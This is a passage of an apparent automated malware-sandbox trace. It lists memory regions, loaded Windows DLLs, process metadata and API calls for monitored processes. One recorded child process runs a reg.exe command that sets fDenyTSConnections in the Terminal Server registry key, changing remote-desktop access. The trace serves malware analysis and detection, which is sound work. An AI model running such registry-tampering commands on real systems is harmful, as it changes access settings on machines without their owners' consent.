0 entry_point = 0x228e0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 1299 start_va = 0x7ff87c640000 end_va = 0x7ff87c64efff monitored = 0 entry_point = 0x7ff87c643210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1367 start_va = 0x520000 end_va = 0x520fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 1368 start_va = 0x7ff87f9d0000 end_va = 0x7ff87fa76fff monitored = 0 entry_point = 0x7ff87f9db4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1371 start_va = 0x530000 end_va = 0x530fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1372 start_va = 0x7ff86efa0000 end_va = 0x7ff86efb0fff monitored = 0 entry_point = 0x7ff86efa2fc0 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 1374 start_va = 0x7ff870c70000 end_va = 0x7ff870ceefff monitored = 0 entry_point = 0x7ff870c87110 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 1375 start_va = 0x7ff87c450000 end_va = 0x7ff87c478fff monitored = 0 entry_point = 0x7ff87c464530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1376 start_va = 0x7ff87c3d0000 end_va = 0x7ff87c425fff monitored = 0 entry_point = 0x7ff87c3e0bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1377 start_va = 0x2230000 end_va = 0x230cfff monitored = 0 entry_point = 0x228e0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 1384 start_va = 0x570000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1385 start_va = 0x2230000 end_va = 0x22affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002230000" filename = "" Region: id = 1386 start_va = 0x22b0000 end_va = 0x232ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022b0000" filename = "" Region: id = 1387 start_va = 0x7ff86e970000 end_va = 0x7ff86e983fff monitored = 0 entry_point = 0x7ff86e971800 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 1945 start_va = 0x7ff86e990000 end_va = 0x7ff86ea85fff monitored = 0 entry_point = 0x7ff86e9c9590 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 1991 start_va = 0x540000 end_va = 0x545fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Thread: id = 18 os_tid = 0x1cc Thread: id = 51 os_tid = 0x1220 Thread: id = 52 os_tid = 0x1238 Thread: id = 66 os_tid = 0xabc Thread: id = 67 os_tid = 0xc28 Thread: id = 68 os_tid = 0xd60 Process: id = "9" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x4a101000" os_pid = "0x44c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0x1104" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 677 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 678 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 679 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 680 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 681 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 682 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 683 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 684 start_va = 0x7ff642880000 end_va = 0x7ff642890fff monitored = 0 entry_point = 0x7ff6428816b0 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 685 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 686 start_va = 0x530000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 687 start_va = 0x7ff87ce40000 end_va = 0x7ff87d027fff monitored = 0 entry_point = 0x7ff87ce6ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 688 start_va = 0x7ff87f640000 end_va = 0x7ff87f6ecfff monitored = 0 entry_point = 0x7ff87f6581a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 689 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 690 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 691 start_va = 0x90000 end_va = 0x14dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 692 start_va = 0x7ff87fde0000 end_va = 0x7ff87fe7cfff monitored = 0 entry_point = 0x7ff87fde78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 693 start_va = 0x150000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 694 start_va = 0x400000 end_va = 0x4bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 695 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 696 start_va = 0x7ff8746c0000 end_va = 0x7ff874718fff monitored = 0 entry_point = 0x7ff8746cfbf0 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 715 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 716 start_va = 0x7ff87f6f0000 end_va = 0x7ff87f96cfff monitored = 0 entry_point = 0x7ff87f7c4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 717 start_va = 0x7ff87fe80000 end_va = 0x7ff87ff9bfff monitored = 0 entry_point = 0x7ff87fec02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 718 start_va = 0x7ff87d030000 end_va = 0x7ff87d099fff monitored = 0 entry_point = 0x7ff87d066d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 719 start_va = 0x7ff87ed60000 end_va = 0x7ff87eeb5fff monitored = 0 entry_point = 0x7ff87ed6a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 720 start_va = 0x7ff87f3e0000 end_va = 0x7ff87f565fff monitored = 0 entry_point = 0x7ff87f42ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 721 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 722 start_va = 0x7ff87d3a0000 end_va = 0x7ff87d4e2fff monitored = 0 entry_point = 0x7ff87d3c8210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 723 start_va = 0x7ff87f970000 end_va = 0x7ff87f9cafff monitored = 0 entry_point = 0x7ff87f9838b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 724 start_va = 0x7ff87d4f0000 end_va = 0x7ff87d52afff monitored = 0 entry_point = 0x7ff87d4f12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 725 start_va = 0x7ff87fa80000 end_va = 0x7ff87fb40fff monitored = 0 entry_point = 0x7ff87faa0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 726 start_va = 0x7ff87ab10000 end_va = 0x7ff87ac95fff monitored = 0 entry_point = 0x7ff87ab5d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 741 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 742 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 743 start_va = 0x630000 end_va = 0x7b7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 744 start_va = 0x7c0000 end_va = 0x940fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007c0000" filename = "" Region: id = 745 start_va = 0x950000 end_va = 0x1d4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000950000" filename = "" Region: id = 746 start_va = 0x1d50000 end_va = 0x1e4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d50000" filename = "" Region: id = 762 start_va = 0x400000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 763 start_va = 0x4b0000 end_va = 0x4bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 764 start_va = 0x7ff87d650000 end_va = 0x7ff87ebaefff monitored = 0 entry_point = 0x7ff87d7b11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 765 start_va = 0x7ff87c710000 end_va = 0x7ff87c752fff monitored = 0 entry_point = 0x7ff87c724b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 766 start_va = 0x7ff87c760000 end_va = 0x7ff87cda3fff monitored = 0 entry_point = 0x7ff87c9264b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 767 start_va = 0x7ff87fd30000 end_va = 0x7ff87fdd6fff monitored = 0 entry_point = 0x7ff87fd458d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 768 start_va = 0x7ff87fb50000 end_va = 0x7ff87fba1fff monitored = 0 entry_point = 0x7ff87fb5f530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 769 start_va = 0x7ff87c640000 end_va = 0x7ff87c64efff monitored = 0 entry_point = 0x7ff87c643210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 770 start_va = 0x7ff87c650000 end_va = 0x7ff87c704fff monitored = 0 entry_point = 0x7ff87c6922e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 771 start_va = 0x7ff87c5f0000 end_va = 0x7ff87c63afff monitored = 0 entry_point = 0x7ff87c5f35f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 772 start_va = 0x7ff87c5d0000 end_va = 0x7ff87c5e3fff monitored = 0 entry_point = 0x7ff87c5d52e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 783 start_va = 0x7ff87af40000 end_va = 0x7ff87afd5fff monitored = 0 entry_point = 0x7ff87af65570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 784 start_va = 0x1d50000 end_va = 0x1e0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d50000" filename = "" Region: id = 785 start_va = 0x1e40000 end_va = 0x1e4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e40000" filename = "" Region: id = 822 start_va = 0x1e50000 end_va = 0x2186fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 823 start_va = 0x2190000 end_va = 0x23a5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002190000" filename = "" Region: id = 867 start_va = 0x23b0000 end_va = 0x25cefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023b0000" filename = "" Region: id = 868 start_va = 0x25d0000 end_va = 0x26e1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 869 start_va = 0x26f0000 end_va = 0x2908fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026f0000" filename = "" Region: id = 870 start_va = 0x2910000 end_va = 0x2a1efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002910000" filename = "" Region: id = 947 start_va = 0x440000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 948 start_va = 0x7ff87fbb0000 end_va = 0x7ff87fd09fff monitored = 0 entry_point = 0x7ff87fbf38e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 949 start_va = 0x50000 end_va = 0x50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 950 start_va = 0x2a20000 end_va = 0x2adbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a20000" filename = "" Region: id = 951 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 952 start_va = 0x7ff87a590000 end_va = 0x7ff87a5b1fff monitored = 0 entry_point = 0x7ff87a591a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 953 start_va = 0x7ff87ad00000 end_va = 0x7ff87ad12fff monitored = 0 entry_point = 0x7ff87ad02760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 954 start_va = 0x7ff87c3d0000 end_va = 0x7ff87c425fff monitored = 0 entry_point = 0x7ff87c3e0bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1040 start_va = 0x60000 end_va = 0x66fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1041 start_va = 0x70000 end_va = 0x70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 1042 start_va = 0x80000 end_va = 0x80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 1043 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 1044 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 1045 start_va = 0x1f0000 end_va = 0x1f4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 1046 start_va = 0x480000 end_va = 0x480fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 1047 start_va = 0x490000 end_va = 0x491fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 1048 start_va = 0x7ff872050000 end_va = 0x7ff8722c3fff monitored = 0 entry_point = 0x7ff8720c0400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 1066 start_va = 0x4a0000 end_va = 0x4a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 1067 start_va = 0x4c0000 end_va = 0x4c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Thread: id = 24 os_tid = 0x688 Thread: id = 25 os_tid = 0x784 Thread: id = 29 os_tid = 0x9dc Thread: id = 38 os_tid = 0x1114 Process: id = "10" image_name = "reg.exe" filename = "c:\\windows\\system32\\reg.exe" page_root = "0x4a121000" os_pid = "0xba0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xe44" cmd_line = "\"C:\\Windows\\System32\\reg.exe\" add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 1 /f" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 699 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 700 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 701 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 702 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 703 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 704 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 705 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 706 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 707 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 708 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 709 start_va = 0x7ff69b220000 end_va = 0x7ff69b275fff monitored = 1 entry_point = 0x7ff69b22e200 region_type = mapped_file name = "reg.exe" filename = "\\Windows\\System32\\reg.exe" (normalized: "c:\\windows\\system32\\reg.exe") Region: id = 710 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 798 start_va = 0x490000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 799 start_va = 0x7ff87ce40000 end_va = 0x7ff87d027fff monitored = 0 entry_point = 0x7ff87ce6ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 800 start_va = 0x7ff87f640000 end_va = 0x7ff87f6ecfff monitored = 0 entry_point = 0x7ff87f6581a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 801 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 802 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 803 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1238 start_va = 0x7ff87fde0000 end_va = 0x7ff87fe7cfff monitored = 0 entry_point = 0x7ff87fde78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1239 start_va = 0x400000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1240 start_va = 0x7ff87fd30000 end_va = 0x7ff87fdd6fff monitored = 0 entry_point = 0x7ff87fd458d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1241 start_va = 0x7ff87f970000 end_va = 0x7ff87f9cafff monitored = 0 entry_point = 0x7ff87f9838b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1242 start_va = 0x7ff87fe80000 end_va = 0x7ff87ff9bfff monitored = 0 entry_point = 0x7ff87fec02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1243 start_va = 0x7ff87eed0000 end_va = 0x7ff87ef3afff monitored = 0 entry_point = 0x7ff87eee90c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1244 start_va = 0x590000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 1245 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1246 start_va = 0x5f0000 end_va = 0x926fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1247 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1289 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 1290 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 1291 start_va = 0x1f0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "reg.exe.mui" filename = "\\Windows\\System32\\en-US\\reg.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\reg.exe.mui") Region: id = 1292 start_va = 0x930000 end_va = 0xa0ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 26 os_tid = 0xb38 [0137.052] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff69b220000 [0137.052] __set_app_type (_Type=0x1) [0137.052] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff69b22e510) returned 0x0 [0137.052] __wgetmainargs (in: _Argc=0x7ff69b232048, _Argv=0x7ff69b232050, _Env=0x7ff69b232058, _DoWildCard=0, _StartInfo=0x7ff69b232064 | out: _Argc=0x7ff69b232048, _Argv=0x7ff69b232050, _Env=0x7ff69b232058) returned 0 [0137.053] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="add", cchCount1=-1, lpString2="QUERY", cchCount2=-1) returned 1 [0137.055] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="add", cchCount1=-1, lpString2="ADD", cchCount2=-1) returned 2 [0137.056] RegOpenKeyW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", phkResult=0xcfeb8 | out: phkResult=0xcfeb8*=0x0) returned 0x2 [0137.056] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="add", cchCount1=-1, lpString2="ADD", cchCount2=-1) returned 2 [0137.056] lstrlenW (lpString="-?|/?|-h|/h") returned 11 [0137.056] GetProcessHeap () returned 0x490000 [0137.056] 